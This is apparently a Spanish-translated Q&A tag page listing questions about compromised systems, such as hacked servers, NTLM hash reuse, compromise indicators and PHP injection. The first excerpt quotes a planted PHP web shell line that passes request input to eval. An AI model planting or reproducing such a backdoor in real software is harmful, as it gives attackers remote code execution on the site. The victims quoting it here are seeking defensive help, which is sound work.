Preguntas con etiqueta 'system-compromise'

3
respuestas

¿Cómo puedo determinar de dónde provino el script inyectado?

Tengo un servidor que actualmente ha sido hackeado. Se están creando archivos en mi servidor que tiene contenido de este tipo: if(isset($_REQUEST['oUS'])){/*PJEG*/eval($_REQUEST['oUS']);/*z*/exit;/*Lv*/} O como esto: <?php /*auV*...
hecha 20.07.2017 - 13:25
1
respuesta

Si el hash NTLM de la cuenta de administrador del dominio está comprometido, ¿se puede usar para acceder a cualquier máquina en la red?

Si un pirata informático puede obtener derechos de administrador local y luego desde allí el hash NTLM del administrador del dominio local. ¿Puede usar este hash sin grietas para acceder a las carpetas compartidas en la red y al recurso compa...
hecha 04.06.2016 - 09:18
2
respuestas

Sitio web pirateado, ¿cómo protegerlo en el futuro?

Tengo un servidor linode con cPanel instalado. Uno de los sitios web de ese servidor fue pirateado y recibí un correo electrónico de cPanel con la siguiente información Top Processes PID Owner CPU % Memory % Command 30005 princ...
hecha 26.08.2016 - 20:18
1
respuesta

¿Las métricas agnósticas del sistema operativo (o plataforma) para entender si un sistema está comprometido?

Para los sistemas basados en Windows, he visto que los cambios en el Registro o en los Directorios del sistema son algunas de las cosas que se utilizan para rastrear si una máquina se ha comprometido. Deben existir cosas similares para otras p...
hecha 14.06.2014 - 17:09
2
respuestas

¿Se puede hackear de forma remota? [cerrado]

Tengo un poco de miedo por la piratería remota, ya que estoy usando Windows 7. Veo lo que puede hacer un hacker si explota la vulnerabilidad DCOM en Windows XP, pero ¿existe este tipo de vulnerabilidad en Windows 7 o Windows 8? En otras palabras...
hecha 17.08.2014 - 12:47
1
respuesta

¿Qué tan comprometido debo asumir que es mi computadora?

Me había convertido en ssh hace un tiempo para hacer un trabajo remoto. Estaba revisando información sobre netstat cuando noté que alguien había establecido una sesión ssh conmigo D: Apagué ssh inmediatamente y busqué dirección . Netstat dij...
hecha 23.05.2014 - 03:31
2
respuestas

La mejor fuente de orientación de configuración de seguridad

A lo largo de los años, he utilizado una serie de diferentes fuentes de orientación de configuración de seguridad para un espectro de sistemas que incluyen, por ejemplo: enlace enlace enlace enlace enlace enlace etc....
hecha 05.10.2018 - 02:26
0
respuestas

¿Los sistemas que se ejecutan son más susceptibles que los sistemas de apagado?

Supongamos que un atacante obtuvo acceso físico a un dispositivo (un teléfono inteligente, por ejemplo). ¿Sería más difícil que el atacante realice acciones malintencionadas en el teléfono cuando este se apaga? Estoy haciendo la pregunta po...
hecha 27.08.2018 - 13:17
1
respuesta

CentOS 6.8 herramientas de red - ¿Está comprometido uno de estos?

Tengo un sistema CentOS 6.8 que está ejecutando Tripwire (la versión Open Source). El sistema se encuentra en una red interna detrás de un firewall que no reenvía ninguna conexión entrante. Es decir. El sistema Centos puede acceder a Internet pe...
hecha 16.01.2017 - 19:07
1
respuesta

PHP Hack Injection - Ayuda para corregir y entender [duplicar]

Hace poco nos infectamos con un hack de PHP y esperábamos que ustedes pudieran arrojar algo más de luz sobre el tema. ¿Principalmente cómo funciona este hack y cómo solucionarlo? Nos estamos moviendo a una nueva configuración, que según nue...
hecha 14.12.2016 - 23:33